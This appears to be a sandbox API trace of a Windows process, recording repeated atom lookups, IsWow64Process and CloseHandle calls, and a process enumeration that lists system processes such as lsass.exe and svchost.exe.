	[0132.606] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.607] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.607] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.607] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.607] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.607] CloseHandle (hObject=0x2dc) returned 1
	[0132.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.607] CloseHandle (hObject=0x2dc) returned 1
	[0132.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.608] CloseHandle (hObject=0x2dc) returned 1
	[0132.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.608] CloseHandle (hObject=0x2dc) returned 1
	[0132.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.608] CloseHandle (hObject=0x2dc) returned 1
	[0132.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.608] CloseHandle (hObject=0x2dc) returned 1
	[0132.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.641] CloseHandle (hObject=0x2dc) returned 1
	[0132.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.641] CloseHandle (hObject=0x2dc) returned 1
	[0132.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.641] CloseHandle (hObject=0x2dc) returned 1
	[0132.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.642] CloseHandle (hObject=0x2dc) returned 1
	[0132.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.642] CloseHandle (hObject=0x2dc) returned 1
	[0132.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.642] CloseHandle (hObject=0x2dc) returned 1
	[0132.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.642] CloseHandle (hObject=0x2dc) returned 1
	[0132.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.643] CloseHandle (hObject=0x2dc) returned 1
	[0132.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.643] CloseHandle (hObject=0x2dc) returned 1
	[0132.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.643] CloseHandle (hObject=0x2dc) returned 1
	[0132.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.643] CloseHandle (hObject=0x2dc) returned 1
	[0132.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.643] CloseHandle (hObject=0x2dc) returned 1
	[0132.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.644] CloseHandle (hObject=0x2dc) returned 1
	[0132.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.644] CloseHandle (hObject=0x2dc) returned 1
	[0132.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.644] CloseHandle (hObject=0x2dc) returned 1
	[0132.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.644] CloseHandle (hObject=0x2dc) returned 1
	[0132.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.645] CloseHandle (hObject=0x2dc) returned 1
	[0132.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.645] CloseHandle (hObject=0x2dc) returned 1
	[0132.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.645] CloseHandle (hObject=0x2dc) returned 1
	[0132.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.645] CloseHandle (hObject=0x2dc) returned 1
	[0132.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.646] CloseHandle (hObject=0x2dc) returned 1
	[0132.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.646] CloseHandle (hObject=0x2dc) returned 1
	[0132.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.646] CloseHandle (hObject=0x2dc) returned 1
	[0132.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.646] CloseHandle (hObject=0x2dc) returned 1
	[0132.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.646] CloseHandle (hObject=0x2dc) returned 1
	[0132.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.647] CloseHandle (hObject=0x2dc) returned 1
	[0132.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.647] CloseHandle (hObject=0x2dc) returned 1
	[0132.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.647] CloseHandle (hObject=0x2dc) returned 1
	[0132.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.647] CloseHandle (hObject=0x2dc) returned 1
	[0132.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.647] CloseHandle (hObject=0x2dc) returned 1
	[0132.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.648] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.648] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.649] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.649] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.649] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.649] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.649] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.649] CloseHandle (hObject=0x2dc) returned 1
	[0132.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.649] CloseHandle (hObject=0x2dc) returned 1
	[0132.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.650] CloseHandle (hObject=0x2dc) returned 1
	[0132.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.650] CloseHandle (hObject=0x2dc) returned 1
	[0132.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.650] CloseHandle (hObject=0x2dc) returned 1
	[0132.650] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.650] CloseHandle (hObject=0x2dc) returned 1
	[0132.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.683] CloseHandle (hObject=0x2dc) returned 1
	[0132.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.683] CloseHandle (hObject=0x2dc) returned 1
	[0132.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.684] CloseHandle (hObject=0x2dc) returned 1
	[0132.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.684] CloseHandle (hObject=0x2dc) returned 1
	[0132.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.684] CloseHandle (hObject=0x2dc) returned 1
	[0132.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.684] CloseHandle (hObject=0x2dc) returned 1
	[0132.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.685] CloseHandle (hObject=0x2dc) returned 1
	[0132.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.685] CloseHandle (hObject=0x2dc) returned 1
	[0132.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.685] CloseHandle (hObject=0x2dc) returned 1
	[0132.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.685] CloseHandle (hObject=0x2dc) returned 1
	[0132.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.686] CloseHandle (hObject=0x2dc) returned 1
	[0132.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.686] CloseHandle (hObject=0x2dc) returned 1
	[0132.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.686] CloseHandle (hObject=0x2dc) returned 1
	[0132.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.686] CloseHandle (hObject=0x2dc) returned 1
	[0132.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.686] CloseHandle (hObject=0x2dc) returned 1
	[0132.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.687] CloseHandle (hObject=0x2dc) returned 1
	[0132.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.687] CloseHandle (hObject=0x2dc) returned 1
	[0132.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.687] CloseHandle (hObject=0x2dc) returned 1
	[0132.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.687] CloseHandle (hObject=0x2dc) returned 1
	[0132.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.688] CloseHandle (hObject=0x2dc) returned 1
	[0132.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.688] CloseHandle (hObject=0x2dc) returned 1
	[0132.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.688] CloseHandle (hObject=0x2dc) returned 1
	[0132.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.688] CloseHandle (hObject=0x2dc) returned 1
	[0132.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.688] CloseHandle (hObject=0x2dc) returned 1
	[0132.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.689] CloseHandle (hObject=0x2dc) returned 1
	[0132.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.689] CloseHandle (hObject=0x2dc) returned 1
	[0132.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.689] CloseHandle (hObject=0x2dc) returned 1
	[0132.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.689] CloseHandle (hObject=0x2dc) returned 1
	[0132.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.690] CloseHandle (hObject=0x2dc) returned 1
	[0132.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.690] CloseHandle (hObject=0x2dc) returned 1
	[0132.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.690] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.690] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.691] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.691] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.691] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.691] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.691] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.691] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.692] CloseHandle (hObject=0x2dc) returned 1
	[0132.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.692] CloseHandle (hObject=0x2dc) returned 1
	[0132.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.692] CloseHandle (hObject=0x2dc) returned 1
	[0132.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.692] CloseHandle (hObject=0x2dc) returned 1
	[0132.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.693] CloseHandle (hObject=0x2dc) returned 1
	[0132.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.693] CloseHandle (hObject=0x2dc) returned 1
	[0132.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.726] CloseHandle (hObject=0x2dc) returned 1
	[0132.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.726] CloseHandle (hObject=0x2dc) returned 1
	[0132.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.727] CloseHandle (hObject=0x2dc) returned 1
	[0132.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.727] CloseHandle (hObject=0x2dc) returned 1
	[0132.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.727] CloseHandle (hObject=0x2dc) returned 1
	[0132.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.727] CloseHandle (hObject=0x2dc) returned 1
	[0132.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.728] CloseHandle (hObject=0x2dc) returned 1
	[0132.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.728] CloseHandle (hObject=0x2dc) returned 1
	[0132.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.728] CloseHandle (hObject=0x2dc) returned 1
	[0132.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.728] CloseHandle (hObject=0x2dc) returned 1
	[0132.728] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.728] CloseHandle (hObject=0x2dc) returned 1
	[0132.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.729] CloseHandle (hObject=0x2dc) returned 1
	[0132.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.729] CloseHandle (hObject=0x2dc) returned 1
	[0132.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.729] CloseHandle (hObject=0x2dc) returned 1
	[0132.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.729] CloseHandle (hObject=0x2dc) returned 1
	[0132.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.730] CloseHandle (hObject=0x2dc) returned 1
	[0132.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.730] CloseHandle (hObject=0x2dc) returned 1
	[0132.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.730] CloseHandle (hObject=0x2dc) returned 1
	[0132.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.730] CloseHandle (hObject=0x2dc) returned 1
	[0132.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.731] CloseHandle (hObject=0x2dc) returned 1
	[0132.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.731] CloseHandle (hObject=0x2dc) returned 1
	[0132.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.731] CloseHandle (hObject=0x2dc) returned 1
	[0132.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.731] CloseHandle (hObject=0x2dc) returned 1
	[0132.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.731] CloseHandle (hObject=0x2dc) returned 1
	[0132.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.732] CloseHandle (hObject=0x2dc) returned 1
	[0132.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.732] CloseHandle (hObject=0x2dc) returned 1
	[0132.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.732] CloseHandle (hObject=0x2dc) returned 1
	[0132.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.732] CloseHandle (hObject=0x2dc) returned 1
	[0132.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.733] CloseHandle (hObject=0x2dc) returned 1
	[0132.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.733] CloseHandle (hObject=0x2dc) returned 1
	[0132.733] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.733] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.733] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.734] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.734] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.734] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.734] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.734] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.734] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.735] CloseHandle (hObject=0x2dc) returned 1
	[0132.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.735] CloseHandle (hObject=0x2dc) returned 1
	[0132.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.735] CloseHandle (hObject=0x2dc) returned 1
	[0132.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.735] CloseHandle (hObject=0x2dc) returned 1
	[0132.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.736] CloseHandle (hObject=0x2dc) returned 1
	[0132.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.736] CloseHandle (hObject=0x2dc) returned 1
	[0132.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16cd8) returned 0xc0000004
	[0132.768] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0132.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0132.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0132.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0132.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
